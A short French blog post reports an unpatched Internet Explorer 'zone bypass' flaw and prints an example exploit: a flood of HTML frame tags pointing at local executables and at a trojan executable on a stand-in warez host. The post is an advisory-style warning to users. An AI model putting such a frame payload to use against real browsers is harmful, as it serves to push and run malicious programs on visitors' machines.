Faille critique d'Internet Explorer à corriger

D'après the inquirer, une faille critique, rapportée entre autre par Symantec et bugtraq, exposant Internet Explorer à des vers ou des trojans ne semble toujours pas corrigée.

Ce problème de "déviation de zone" (zone bypass) peut forcer le navigateur à exécuter un programme inséré par l'intermédiaire d'une balise de frame, suite à l'interprétation d'un grand nombre de frame.

Voici une illustration du code, qui est là à titre d'exemple et qui n'est bien entendu pas représentatif de la meilleure façon de l'utiliser.

<FRAME SRC="C:winntnotepad.exe"></FRAME>
<FRAME SRC="C:winntregedit.exe"></FRAME>
.............n repetitions........
<FRAME SRC="http://www.warez.org/trojan.exe"></FRAME>
<FRAME SRC="http://www.warez.org/trojan.exe"></FRAME>

En fait, un "flood" est utilisé de manière à saturer la table des zones du navigateur et à obliger l'exécution d'une application qui se pourrait être malveillante.

Dans un souci de rigueur, j'ai personnellement cliqué sur un lien illustrant le procédé (sans trojan heureusement) et ce flood est à lui seul particulièrement désagréable. Notamment quand on a oublié de sauvegarder son travail avant :)

Remarque:
The inquirer emettait l'hypothèse que le correctif pourrait être disponible (mais qu'ils n'étaient pas au courant). Mon navigateur y étant sensible sous Windows XP IE 6.0 SP1 (aucune mise à jour pour une faille critique proposée sur le site de windows update), il me parait probable qu'il ne soit pas encore sorti.

Espérons qu'il ne se fera pas trop attendre.